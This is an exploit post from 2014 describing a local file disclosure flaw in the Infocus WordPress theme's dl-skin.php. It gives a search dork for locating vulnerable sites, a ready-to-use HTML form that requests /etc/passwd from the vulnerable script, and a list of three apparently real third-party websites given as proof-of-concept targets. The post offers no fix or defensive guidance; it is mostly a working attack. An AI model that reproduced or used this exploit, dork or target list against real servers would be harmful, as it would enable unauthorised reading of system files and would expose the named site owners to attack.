Home / exploits WordPress Infocus Local File Disclosure
Posted on 10 June 2014
[+] Post Local File Disclosure in wordpress theme Infocus [+] Date: 07/06/2014 [+] CWE Number: CWE-98 [+] Risk: High [+] Author: Felipe Andrian Peixoto [+] Dork:inurl:"/wp-content/themes/infocus/" [+] Vendor Homepage: http://themeforest.net/item/infocus-powerful-professional-wordpress-theme/85486 [+] Contact: felipe_andrian@hotmail.com [+] Tested on: Windows 7 and Linux [+] Vulnerable File: dl-skin.php [+] Exploit : <html> <body> <form action="http://www.site.com/wp-content/themes/infocus/lib/scripts/dl-skin.php" method="post"> Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br> <input type="submit"> </form> </body> </html> [+] PoC: http://www.sonorabehavioral.com/wp-content/themes/infocus/lib/scripts/dl-skin.php http://www.harmonyhouse.uk.com/wp-content/themes/infocus/lib/scripts/dl-skin.php http://foulaneautoecole.com/wp-content/themes/infocus/lib/scripts/dl-skin.php eof
